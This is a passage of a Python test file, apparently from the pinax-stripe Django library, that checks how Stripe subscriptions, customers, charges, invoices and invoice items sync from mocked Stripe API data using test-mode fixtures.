"metadata": {
},
"name": "The Pro Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
"quantity": 1,
"start": 1448499344,
"status": "trialing",
"tax_percent": None,
"trial_end": 1448758544,
"trial_start": 1448499344
}
sub = subscriptions.sync_subscription_from_stripe_data(self.customer, subscription)
self.assertEquals(Subscription.objects.get(stripe_id=subscription["id"]), sub)
self.assertEquals(sub.status, "trialing")
subscription["discount"] = {
"object": "discount",
"coupon": {
"id": "35OFF",
"object": "coupon",
"amount_off": None,
"created": 1391694467,
"currency": None,
"duration": "repeating",
"duration_in_months": 3,
"livemode": False,
"max_redemptions": None,
"metadata": {
},
"percent_off": 35,
"redeem_by": None,
"times_redeemed": 1,
"valid": True
},
"customer": self.customer.stripe_id,
"end": 1399384361,
"start": 1391694761,
"subscription": subscription["id"]
}
subscriptions.sync_subscription_from_stripe_data(self.customer, subscription)
d = Subscription.objects.get(stripe_id=subscription["id"]).discount
self.assertEquals(d.coupon.percent_off, decimal.Decimal(35.00))
def test_sync_subscription_from_stripe_data_updated(self):
Plan.objects.create(stripe_id="pro2", interval="month", interval_count=1, amount=decimal.Decimal("19.99"))
subscription = {
"id": "sub_7Q4BX0HMfqTpN8",
"object": "subscription",
"application_fee_percent": None,
"cancel_at_period_end": False,
"canceled_at": None,
"current_period_end": 1448758544,
"current_period_start": 1448499344,
"customer": self.customer.stripe_id,
"discount": {
"object": "discount",
"coupon": {
"id": "35OFF",
"object": "coupon",
"amount_off": None,
"created": 1391694467,
"currency": None,
"duration": "repeating",
"duration_in_months": 3,
"livemode": False,
"max_redemptions": None,
"metadata": {
},
"percent_off": 35,
"redeem_by": None,
"times_redeemed": 1,
"valid": True
},
"customer": self.customer.stripe_id,
"end": 1399384361,
"start": 1391694761,
"subscription": "sub_7Q4BX0HMfqTpN8"
},
"ended_at": None,
"metadata": {
},
"plan": {
"id": "pro2",
"object": "plan",
"amount": 1999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {
},
"name": "The Pro Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
"quantity": 1,
"start": 1448499344,
"status": "trialing",
"tax_percent": None,
"trial_end": 1448758544,
"trial_start": 1448499344
}
with self.assertRaises(Discount.DoesNotExist):
Discount.objects.get(subscription__stripe_id="sub_7Q4BX0HMfqTpN8")
subscriptions.sync_subscription_from_stripe_data(self.customer, subscription)
self.assertEquals(Subscription.objects.get(stripe_id=subscription["id"]).status, "trialing")
subscription.update({"status": "active"})
subscriptions.sync_subscription_from_stripe_data(self.customer, subscription)
s = Subscription.objects.get(stripe_id=subscription["id"])
self.assertEquals(s.status, "active")
self.assertTrue(Discount.objects.filter(subscription__stripe_id="sub_7Q4BX0HMfqTpN8").exists())
self.assertEquals(s.discount.coupon.stripe_id, "35OFF")
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
@patch("stripe.Customer.retrieve")
def test_sync_customer(self, RetreiveMock, SyncPaymentSourceMock, SyncSubscriptionMock):
RetreiveMock.return_value = dict(
account_balance=1999,
currency="usd",
delinquent=False,
default_source=None,
sources=dict(data=[Mock()]),
subscriptions=dict(data=[Mock()])
)
customers.sync_customer(self.customer)
customer = Customer.objects.get(user=self.user)
self.assertEquals(customer.account_balance, decimal.Decimal("19.99"))
self.assertEquals(customer.currency, "usd")
self.assertEquals(customer.delinquent, False)
self.assertEquals(customer.default_source, "")
self.assertTrue(SyncPaymentSourceMock.called)
self.assertTrue(SyncSubscriptionMock.called)
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
def test_sync_customer_no_cu_provided(self, SyncPaymentSourceMock, SyncSubscriptionMock):
cu = dict(
account_balance=1999,
currency="usd",
delinquent=False,
default_source=None,
sources=dict(data=[Mock()]),
subscriptions=dict(data=[Mock()])
)
customers.sync_customer(self.customer, cu=cu)
customer = Customer.objects.get(user=self.user)
self.assertEquals(customer.account_balance, decimal.Decimal("19.99"))
self.assertEquals(customer.currency, "usd")
self.assertEquals(customer.delinquent, False)
self.assertEquals(customer.default_source, "")
self.assertTrue(SyncPaymentSourceMock.called)
self.assertTrue(SyncSubscriptionMock.called)
@patch("pinax.stripe.actions.customers.purge_local")
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
@patch("stripe.Customer.retrieve")
def test_sync_customer_purged_locally(self, RetrieveMock, SyncPaymentSourceMock, SyncSubscriptionMock, PurgeLocalMock):
self.customer.date_purged = timezone.now()
customers.sync_customer(self.customer)
self.assertFalse(RetrieveMock.called)
self.assertFalse(SyncPaymentSourceMock.called)
self.assertFalse(SyncSubscriptionMock.called)
self.assertFalse(PurgeLocalMock.called)
@patch("pinax.stripe.actions.customers.purge_local")
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
@patch("stripe.Customer.retrieve")
def test_sync_customer_purged_remotely_not_locally(self, RetrieveMock, SyncPaymentSourceMock, SyncSubscriptionMock, PurgeLocalMock):
RetrieveMock.return_value = dict(
deleted=True
)
customers.sync_customer(self.customer)
self.assertFalse(SyncPaymentSourceMock.called)
self.assertFalse(SyncSubscriptionMock.called)
self.assertTrue(PurgeLocalMock.called)
@patch("pinax.stripe.actions.invoices.sync_invoice_from_stripe_data")
@patch("stripe.Customer.retrieve")
def test_sync_invoices_for_customer(self, RetreiveMock, SyncMock):
RetreiveMock().invoices().data = [Mock()]
invoices.sync_invoices_for_customer(self.customer)
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Customer.retrieve")
def test_sync_charges_for_customer(self, RetreiveMock, SyncMock):
RetreiveMock().charges().data = [Mock()]
charges.sync_charges_for_customer(self.customer)
self.assertTrue(SyncMock.called)
def test_sync_charge_from_stripe_data(self):
data = {
"id": "ch_17A1dUI10iPhvocMOecpvQlI",
"object": "charge",
"amount": 200,
"amount_refunded": 0,
"application_fee": None,
"balance_transaction": "txn_179l3zI10iPhvocMhvKxAer7",
"captured": True,
"created": 1448213304,
"currency": "usd",
"customer": self.customer.stripe_id,
"description": None,
"destination": None,
"dispute": None,
"failure_code": None,
"failure_message": None,
"fraud_details": {
},
"invoice": "in_17A1dUI10iPhvocMSGtIfUDF",
"livemode": False,
"metadata": {
},
"paid": True,
"receipt_email": None,
"receipt_number": None,
"refunded": False,
"refunds": {
"object": "list",
"data": [
],
"has_more": False,
"total_count": 0,
"url": "/v1/charges/ch_17A1dUI10iPhvocMOecpvQlI/refunds"
},
"shipping": None,
"source": {
"id": "card_179o0lI10iPhvocMZgdPiR5M",
"object": "card",
"address_city": None,
"address_country": None,
"address_line1": None,
"address_line1_check": None,
"address_line2": None,
"address_state": None,
"address_zip": None,
"address_zip_check": None,
"brand": "Visa",
"country": "US",
"customer": "cus_7ObCqsp1NGVT6o",
"cvc_check": None,
"dynamic_last4": None,
"exp_month": 10,
"exp_year": 2019,
"funding": "credit",
"last4": "4242",
"metadata": {
},
"name": None,
"tokenization_method": None
},
"statement_descriptor": "A descriptor",
"status": "succeeded"
}
charges.sync_charge_from_stripe_data(data)
charge = Charge.objects.get(customer=self.customer, stripe_id=data["id"])
self.assertEquals(charge.amount, decimal.Decimal("2"))
def test_sync_charge_from_stripe_data_balance_transaction(self):
data = {
"id": "ch_17A1dUI10iPhvocMOecpvQlI",
"object": "charge",
"amount": 200,
"amount_refunded": 0,
"application_fee": None,
"balance_transaction": {
"id": "txn_19XJJ02eZvKYlo2ClwuJ1rbA",
"object": "balance_transaction",
"amount": 999,
"available_on": 1483920000,
"created": 1483315442,
"currency": "usd",
"description": None,
"fee": 59,
"fee_details": [
{
"amount": 59,
"application": None,
"currency": "usd",
"description": "Stripe processing fees",
"type": "stripe_fee"
}
],
"net": 940,
"source": "ch_19XJJ02eZvKYlo2CHfSUsSpl",
"status": "pending",
"type": "charge"
},
"captured": True,
"created": 1448213304,
"currency": "usd",
"customer": self.customer.stripe_id,
"description": None,
"destination": None,
"dispute": None,
"failure_code": None,
"failure_message": None,
"fraud_details": {
},
"invoice": "in_17A1dUI10iPhvocMSGtIfUDF",
"livemode": False,
"metadata": {
},
"paid": True,
"receipt_email": None,
"receipt_number": None,
"refunded": False,
"refunds": {
"object": "list",
"data": [
],
"has_more": False,
"total_count": 0,
"url": "/v1/charges/ch_17A1dUI10iPhvocMOecpvQlI/refunds"
},
"shipping": None,
"source": {
"id": "card_179o0lI10iPhvocMZgdPiR5M",
"object": "card",
"address_city": None,
"address_country": None,
"address_line1": None,
"address_line1_check": None,
"address_line2": None,
"address_state": None,
"address_zip": None,
"address_zip_check": None,
"brand": "Visa",
"country": "US",
"customer": "cus_7ObCqsp1NGVT6o",
"cvc_check": None,
"dynamic_last4": None,
"exp_month": 10,
"exp_year": 2019,
"funding": "credit",
"last4": "4242",
"metadata": {
},
"name": None,
"tokenization_method": None
},
"statement_descriptor": "A descriptor",
"status": "succeeded"
}
charges.sync_charge_from_stripe_data(data)
charge = Charge.objects.get(customer=self.customer, stripe_id=data["id"])
self.assertEquals(charge.amount, decimal.Decimal("2"))
self.assertEquals(charge.available, False)
self.assertEquals(charge.fee, decimal.Decimal("0.59"))
self.assertEquals(charge.currency, "usd")
def test_sync_charge_from_stripe_data_description(self):
data = {
"id": "ch_17A1dUI10iPhvocMOecpvQlI",
"object": "charge",
"amount": 200,
"amount_refunded": 0,
"application_fee": None,
"balance_transaction": "txn_179l3zI10iPhvocMhvKxAer7",
"captured": True,
"created": 1448213304,
"currency": "usd",
"customer": self.customer.stripe_id,
"description": "This was a charge for awesome.",
"destination": None,
"dispute": None,
"failure_code": None,
"failure_message": None,
"fraud_details": {
},
"invoice": "in_17A1dUI10iPhvocMSGtIfUDF",
"livemode": False,
"metadata": {
},
"paid": True,
"receipt_email": None,
"receipt_number": None,
"refunded": False,
"refunds": {
"object": "list",
"data": [
],
"has_more": False,
"total_count": 0,
"url": "/v1/charges/ch_17A1dUI10iPhvocMOecpvQlI/refunds"
},
"shipping": None,
"source": {
"id": "card_179o0lI10iPhvocMZgdPiR5M",
"object": "card",
"address_city": None,
"address_country": None,
"address_line1": None,
"address_line1_check": None,
"address_line2": None,
"address_state": None,
"address_zip": None,
"address_zip_check": None,
"brand": "Visa",
"country": "US",
"customer": "cus_7ObCqsp1NGVT6o",
"cvc_check": None,
"dynamic_last4": None,
"exp_month": 10,
"exp_year": 2019,
"funding": "credit",
"last4": "4242",
"metadata": {
},
"name": None,
"tokenization_method": None
},
"statement_descriptor": "A descriptor",
"status": "succeeded"
}
charges.sync_charge_from_stripe_data(data)
charge = Charge.objects.get(customer=self.customer, stripe_id=data["id"])
self.assertEquals(charge.amount, decimal.Decimal("2"))
self.assertEquals(charge.description, "This was a charge for awesome.")
def test_sync_charge_from_stripe_data_amount_refunded(self):
data = {
"id": "ch_17A1dUI10iPhvocMOecpvQlI",
"object": "charge",
"amount": 200,
"amount_refunded": 10000,
"application_fee": None,
"balance_transaction": "txn_179l3zI10iPhvocMhvKxAer7",
"captured": True,
"created": 1448213304,
"currency": "usd",
"customer": self.customer.stripe_id,
"description": None,
"destination": None,
"dispute": None,
"failure_code": None,
"failure_message": None,
"fraud_details": {
},
"invoice": "in_17A1dUI10iPhvocMSGtIfUDF",
"livemode": False,
"metadata": {
},
"paid": True,
"receipt_email": None,
"receipt_number": None,
"refunded": False,
"refunds": {
"object": "list",
"data": [
],
"has_more": False,
"total_count": 0,
"url": "/v1/charges/ch_17A1dUI10iPhvocMOecpvQlI/refunds"
},
"shipping": None,
"source": {
"id": "card_179o0lI10iPhvocMZgdPiR5M",
"object": "card",
"address_city": None,
"address_country": None,
"address_line1": None,
"address_line1_check": None,
"address_line2": None,
"address_state": None,
"address_zip": None,
"address_zip_check": None,
"brand": "Visa",
"country": "US",
"customer": "cus_7ObCqsp1NGVT6o",
"cvc_check": None,
"dynamic_last4": None,
"exp_month": 10,
"exp_year": 2019,
"funding": "credit",
"last4": "4242",
"metadata": {
},
"name": None,
"tokenization_method": None
},
"statement_descriptor": "A descriptor",
"status": "succeeded"
}
charges.sync_charge_from_stripe_data(data)
charge = Charge.objects.get(customer=self.customer, stripe_id=data["id"])
self.assertEquals(charge.amount, decimal.Decimal("2"))
self.assertEquals(charge.amount_refunded, decimal.Decimal("100"))
def test_sync_charge_from_stripe_data_refunded(self):
data = {
"id": "ch_17A1dUI10iPhvocMOecpvQlI",
"object": "charge",
"amount": 200,
"amount_refunded": 0,
"application_fee": None,
"balance_transaction": "txn_179l3zI10iPhvocMhvKxAer7",
"captured": True,
"created": 1448213304,
"currency": "usd",
"customer": self.customer.stripe_id,
"description": None,
"destination": None,
"dispute": None,
"failure_code": None,
"failure_message": None,
"fraud_details": {
},
"invoice": "in_17A1dUI10iPhvocMSGtIfUDF",
"livemode": False,
"metadata": {
},
"paid": True,
"receipt_email": None,
"receipt_number": None,
"refunded": True,
"refunds": {
"object": "list",
"data": [
],
"has_more": False,
"total_count": 0,
"url": "/v1/charges/ch_17A1dUI10iPhvocMOecpvQlI/refunds"
},
"shipping": None,
"source": {
"id": "card_179o0lI10iPhvocMZgdPiR5M",
"object": "card",
"address_city": None,
"address_country": None,
"address_line1": None,
"address_line1_check": None,
"address_line2": None,
"address_state": None,
"address_zip": None,
"address_zip_check": None,
"brand": "Visa",
"country": "US",
"customer": "cus_7ObCqsp1NGVT6o",
"cvc_check": None,
"dynamic_last4": None,
"exp_month": 10,
"exp_year": 2019,
"funding": "credit",
"last4": "4242",
"metadata": {
},
"name": None,
"tokenization_method": None
},
"statement_descriptor": "A descriptor",
"status": "succeeded"
}
charges.sync_charge_from_stripe_data(data)
charge = Charge.objects.get(customer=self.customer, stripe_id=data["id"])
self.assertEquals(charge.amount, decimal.Decimal("2"))
self.assertEquals(charge.refunded, True)
def test_sync_charge_from_stripe_data_failed(self):
data = {
"id": "ch_xxxxxxxxxxxxxxxxxxxxxxxx",
"object": "charge",
"amount": 200,
"amount_refunded": 0,
"application": None,
"application_fee": None,
"balance_transaction": None,
"captured": False,
"created": 1488208611,
"currency": "usd",
"customer": None,
"description": None,
"destination": None,
"dispute": None,
"failure_code": "card_declined",
"failure_message": "Your card was declined.",
"fraud_details": {},
"invoice": None,
"livemode": False,
"metadata": {},
"on_behalf_of": None,
"order": None,
"outcome": {
"network_status": "declined_by_network",
"reason": "generic_decline",
"risk_level": "normal",
"seller_message": "The bank did not return any further details with this decline.",
"type": "issuer_declined"
},
"paid": False,
"receipt_email": None,
"receipt_number": None,
"refunded": False,
"refunds": {
"object": "list",
"data": [],
"has_more": False,
"total_count": 0,
"url": "/v1/charges/ch_xxxxxxxxxxxxxxxxxxxxxxxx/refunds"
},
"review": None,
"shipping": None,
"source": {
"id": "card_xxxxxxxxxxxxxxxxxxxxxxxx",
"object": "card",
"address_city": None,
"address_country": None,
"address_line1": None,
"address_line1_check": None,
"address_line2": None,
"address_state": None,
"address_zip": "424",
"address_zip_check": "pass",
"brand": "Visa",
"country": "US",
"customer": None,
"cvc_check": "pass",
"dynamic_last4": None,
"exp_month": 4,
"exp_year": 2024,
"fingerprint": "xxxxxxxxxxxxxxxx",
"funding": "credit",
"last4": "0341",
"metadata": {},
"name": "example@example.com",
"tokenization_method": None
},
"source_transfer": None,
"statement_descriptor": None,
"status": "failed",
"transfer_group": None
}
charges.sync_charge_from_stripe_data(data)
charge = Charge.objects.get(stripe_id=data["id"])
self.assertEqual(charge.amount, decimal.Decimal("2"))
self.assertEqual(charge.customer, None)
self.assertEqual(charge.outcome["risk_level"], "normal")
@patch("stripe.Subscription.retrieve")
def test_retrieve_stripe_subscription(self, RetrieveMock):
RetrieveMock.return_value = stripe.Subscription(
customer="cus_xxxxxxxxxxxxxxx"
)
value = subscriptions.retrieve(self.customer, "sub id")
self.assertEquals(value, RetrieveMock.return_value)
def test_retrieve_stripe_subscription_no_sub_id(self):
value = subscriptions.retrieve(self.customer, None)
self.assertIsNone(value)
@patch("stripe.Subscription.retrieve")
def test_retrieve_stripe_subscription_diff_customer(self, RetrieveMock):
class Subscription:
customer = "cus_xxxxxxxxxxxxZZZ"
RetrieveMock.return_value = Subscription()
value = subscriptions.retrieve(self.customer, "sub_id")
self.assertIsNone(value)
@patch("stripe.Subscription.retrieve")
def test_retrieve_stripe_subscription_missing_subscription(self, RetrieveMock):
RetrieveMock.return_value = None
value = subscriptions.retrieve(self.customer, "sub id")
self.assertIsNone(value)
@patch("stripe.Subscription.retrieve")
def test_retrieve_stripe_subscription_invalid_request(self, RetrieveMock):
def bad_request(*args, **kwargs):
raise stripe.error.InvalidRequestError("Bad", "error")
RetrieveMock.side_effect = bad_request
with self.assertRaises(stripe.error.InvalidRequestError):
subscriptions.retrieve(self.customer, "sub id")
def test_sync_invoice_items(self):
plan = Plan.objects.create(stripe_id="pro2", interval="month", interval_count=1, amount=decimal.Decimal("19.99"))
subscription = Subscription.objects.create(
stripe_id="sub_7Q4BX0HMfqTpN8",
customer=self.customer,
plan=plan,
quantity=1,
status="active",
start=timezone.now()
)
invoice = Invoice.objects.create(
stripe_id="inv_001",
customer=self.customer,
amount_due=100,
period_end=timezone.now(),
period_start=timezone.now(),
subtotal=100,
total=100,
date=timezone.now(),
subscription=subscription
)
items = [{
"id": subscription.stripe_id,
"object": "line_item",
"amount": 0,
"currency": "usd",
"description": None,
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"plan": {
"id": "pro2",
"object": "plan",
"amount": 1999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {
},
"name": "The Pro Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "subscription"
}]
invoices.sync_invoice_items(invoice, items)
self.assertTrue(invoice.items.all().count(), 1)
def test_sync_invoice_items_no_plan(self):
plan = Plan.objects.create(stripe_id="pro2", interval="month", interval_count=1, amount=decimal.Decimal("19.99"))
subscription = Subscription.objects.create(
stripe_id="sub_7Q4BX0HMfqTpN8",
customer=self.customer,
plan=plan,
quantity=1,
status="active",
start=timezone.now()
)
invoice = Invoice.objects.create(
stripe_id="inv_001",
customer=self.customer,
amount_due=100,
period_end=timezone.now(),
period_start=timezone.now(),
subtotal=100,
total=100,
date=timezone.now(),
subscription=subscription
)
items = [{
"id": subscription.stripe_id,
"object": "line_item",
"amount": 0,
"currency": "usd",
"description": None,
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "subscription"
}]
invoices.sync_invoice_items(invoice, items)
self.assertTrue(invoice.items.all().count(), 1)
self.assertEquals(invoice.items.all()[0].plan, plan)
def test_sync_invoice_items_type_not_subscription(self):
invoice = Invoice.objects.create(
stripe_id="inv_001",
customer=self.customer,
amount_due=100,
period_end=timezone.now(),
period_start=timezone.now(),
subtotal=100,
total=100,
date=timezone.now()
)
items = [{
"id": "ii_23lkj2lkj",
"object": "line_item",
"amount": 2000,
"currency": "usd",
"description": "Something random",
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "line_item"
}]
invoices.sync_invoice_items(invoice, items)
self.assertTrue(invoice.items.all().count(), 1)
self.assertEquals(invoice.items.all()[0].description, "Something random")
self.assertEquals(invoice.items.all()[0].amount, decimal.Decimal("20"))
@patch("pinax.stripe.actions.subscriptions.retrieve")
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
def test_sync_invoice_items_different_stripe_id_than_invoice(self, SyncMock, RetrieveSubscriptionMock): # two subscriptions on invoice?
Plan.objects.create(stripe_id="simple", interval="month", interval_count=1, amount=decimal.Decimal("9.99"))
plan = Plan.objects.create(stripe_id="pro2", interval="month", interval_count=1, amount=decimal.Decimal("19.99"))
subscription = Subscription.objects.create(
stripe_id="sub_7Q4BX0HMfqTpN8",
customer=self.customer,
plan=plan,
quantity=1,
status="active",
start=timezone.now()
)
invoice = Invoice.objects.create(
stripe_id="inv_001",
customer=self.customer,
amount_due=100,
period_end=timezone.now(),
period_start=timezone.now(),
subtotal=100,
total=100,
date=timezone.now(),
subscription=subscription
)
SyncMock.return_value = subscription
items = [{
"id": subscription.stripe_id,
"object": "line_item",
"amount": 0,
"currency": "usd",
"description": None,
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"plan": {
"id": "pro2",
"object": "plan",
"amount": 1999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {
},
"name": "The Pro Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "subscription"
}, {
"id": "sub_7Q4BX0HMfqTpN9",
"object": "line_item",
"amount": 0,
"currency": "usd",
"description": None,
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"plan": {
"id": "simple",
"object": "plan",
"amount": 999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {
},
"name": "The Simple Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "subscription"
}]
invoices.sync_invoice_items(invoice, items)
self.assertTrue(invoice.items.all().count(), 2)
@patch("pinax.stripe.actions.subscriptions.retrieve")
def test_sync_invoice_items_updating(self, RetrieveSubscriptionMock):
RetrieveSubscriptionMock.return_value = None
Plan.objects.create(stripe_id="simple", interval="month", interval_count=1, amount=decimal.Decimal("9.99"))
plan = Plan.objects.create(stripe_id="pro2", interval="month", interval_count=1, amount=decimal.Decimal("19.99"))
subscription = Subscription.objects.create(
stripe_id="sub_7Q4BX0HMfqTpN8",
customer=self.customer,
plan=plan,
quantity=1,
status="active",
start=timezone.now()
)
invoice = Invoice.objects.create(
stripe_id="inv_001",
customer=self.customer,
amount_due=100,
period_end=timezone.now(),
period_start=timezone.now(),
subtotal=100,
total=100,
date=timezone.now(),
subscription=subscription
)
items = [{
"id": subscription.stripe_id,
"object": "line_item",
"amount": 0,
"currency": "usd",
"description": None,
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"plan": {
"id": "pro2",
"object": "plan",
"amount": 1999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {
},
"name": "The Pro Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "subscription"
}, {
"id": "sub_7Q4BX0HMfqTpN9",
"object": "line_item",
"amount": 0,
"currency": "usd",
"description": None,
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"plan": {
"id": "simple",
"object": "plan",
"amount": 999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {
},
"name": "The Simple Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "subscription"
}]
invoices.sync_invoice_items(invoice, items)
self.assertEquals(invoice.items.count(), 2)
items[1].update({"description": "This is your second subscription"})
invoices.sync_invoice_items(invoice, items)
self.assertEquals(invoice.items.count(), 2)
self.assertEquals(invoice.items.get(stripe_id="sub_7Q4BX0HMfqTpN9").description, "This is your second subscription")
class InvoiceSyncsTests(TestCase):
def setUp(self):
self.User = get_user_model()
self.user = self.User.objects.create_user(
username="patrick",
email="paltman@example.com"
)
self.customer = Customer.objects.create(
user=self.user,
stripe_id="cus_xxxxxxxxxxxxxxx"
)
plan = Plan.objects.create(stripe_id="pro2", interval="month", interval_count=1, amount=decimal.Decimal("19.99"))
self.subscription = Subscription.objects.create(
stripe_id="sub_7Q4BX0HMfqTpN8",
customer=self.customer,
plan=plan,
quantity=1,
status="active",
start=timezone.now()
)
self.invoice_data = {
"id": "in_17B6e8I10iPhvocMGtYd4hDD",
"object": "invoice",
"amount_due": 1999,
"application_fee": None,
"attempt_count": 0,
"attempted": False,
"charge": None,
"closed": False,
"currency": "usd",
"customer": self.customer.stripe_id,
"date": 1448470892,
"description": None,
"discount": None,
"ending_balance": None,
"forgiven": False,
"lines": {
"data": [{
"id": self.subscription.stripe_id,
"object": "line_item",
"amount": 0,
"currency": "usd",
"description": None,
"discountable": True,
"livemode": True,
"metadata": {
},
"period": {
"start": 1448499344,
"end": 1448758544
},
"plan": {
"id": "pro2",
"object": "plan",
"amount": 1999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {
},
"name": "The Pro Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
"proration": False,
"quantity": 1,
"subscription": None,
"type": "subscription"
}],
"total_count": 1,
"object": "list",
"url": "/v1/invoices/in_17B6e8I10iPhvocMGtYd4hDD/lines"
},
"livemode": False,
"metadata": {
},
"next_payment_attempt": 1448474492,
"paid": False,
"period_end": 1448470739,
"period_start": 1448211539,
"receipt_number": None,
"starting_balance": 0,
"statement_descriptor": None,
"subscription": self.subscription.stripe_id,
"subtotal": 1999,
"tax": None,
"tax_percent": None,
"total": 1999,
"webhooks_delivered_at": None
}
self.account = Account.objects.create(stripe_id="acct_X")
@patch("pinax.stripe.hooks.hookset.send_receipt")
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("stripe.Charge.retrieve")
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("pinax.stripe.actions.invoices.sync_invoice_items")
@patch("pinax.stripe.actions.subscriptions.retrieve")
def test_sync_invoice_from_stripe_data(self, RetrieveSubscriptionMock, SyncInvoiceItemsMock, SyncChargeMock, ChargeFetchMock, SyncSubscriptionMock, SendReceiptMock):
charge = Charge.objects.create(
stripe_id="ch_XXXXXX",
customer=self.customer,
source="card_01",
amount=decimal.Decimal("10.00"),
currency="usd",
paid=True,
refunded=False,
disputed=False
)
self.invoice_data["charge"] = charge.stripe_id
SyncChargeMock.return_value = charge
SyncSubscriptionMock.return_value = self.subscription
invoices.sync_invoice_from_stripe_data(self.invoice_data)
self.assertTrue(SyncInvoiceItemsMock.called)
self.assertEquals(Invoice.objects.filter(customer=self.customer).count(), 1)
self.assertTrue(ChargeFetchMock.called)
self.assertTrue(SyncChargeMock.called)
self.assertTrue(SendReceiptMock.called)
@patch("pinax.stripe.hooks.hookset.send_receipt")
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("stripe.Charge.retrieve")
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("pinax.stripe.actions.invoices.sync_invoice_items")
@patch("pinax.stripe.actions.subscriptions.retrieve")
def test_sync_invoice_from_stripe_data_no_send_receipt(self, RetrieveSubscriptionMock, SyncInvoiceItemsMock, SyncChargeMock, ChargeFetchMock, SyncSubscriptionMock, SendReceiptMock):
charge = Charge.objects.create(
stripe_id="ch_XXXXXX",
customer=self.customer,
source="card_01",
amount=decimal.Decimal("10.00"),
currency="usd",
paid=True,
refunded=False,
disputed=False
)
self.invoice_data["charge"] = charge.stripe_id
SyncChargeMock.return_value = charge
SyncSubscriptionMock.return_value = self.subscription
invoices.sync_invoice_from_stripe_data(self.invoice_data, send_receipt=False)
self.assertTrue(SyncInvoiceItemsMock.called)
self.assertEquals(Invoice.objects.filter(customer=self.customer).count(), 1)
self.assertTrue(ChargeFetchMock.called)
self.assertTrue(SyncChargeMock.called)
self.assertFalse(SendReceiptMock.called)
@patch("pinax.stripe.hooks.hookset.send_receipt")
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("stripe.Charge.retrieve")
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("pinax.stripe.actions.invoices.sync_invoice_items")
@patch("pinax.stripe.actions.subscriptions.retrieve")
def test_sync_invoice_from_stripe_data_connect(self, RetrieveSubscriptionMock, SyncInvoiceItemsMock, SyncChargeMock, ChargeFetchMock, SyncSubscriptionMock, SendReceiptMock):
self.invoice_data["charge"] = "ch_XXXXXX"
self.customer.stripe_account = self.account
self.customer.save()
charge = Charge.objects.create(
stripe_id="ch_XXXXXX",
customer=self.customer,
source="card_01",
amount=decimal.Decimal("10.00"),
currency="usd",
paid=True,
refunded=False,
disputed=False
)
SyncChargeMock.return_value = charge
SyncSubscriptionMock.return_value = self.subscription
invoices.sync_invoice_from_stripe_data(self.invoice_data)
self.assertTrue(SyncInvoiceItemsMock.called)
self.assertEquals(Invoice.objects.filter(customer=self.customer).count(), 1)
self.assertTrue(ChargeFetchMock.called)
args, kwargs = ChargeFetchMock.call_args
self.assertEquals(args, ("ch_XXXXXX",))
self.assertEquals(kwargs, {"stripe_account": "acct_X",
"expand": ["balance_transaction"]})
self.assertTrue(SyncChargeMock.called)
self.assertTrue(SendReceiptMock.called)
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("pinax.stripe.actions.invoices.sync_invoice_items")
@patch("pinax.stripe.actions.subscriptions.retrieve")
def test_sync_invoice_from_stripe_data_no_charge(self, RetrieveSubscriptionMock, SyncInvoiceItemsMock, SyncSubscriptionMock):
SyncSubscriptionMock.return_value = self.subscription
self.invoice_data["charge"] = None
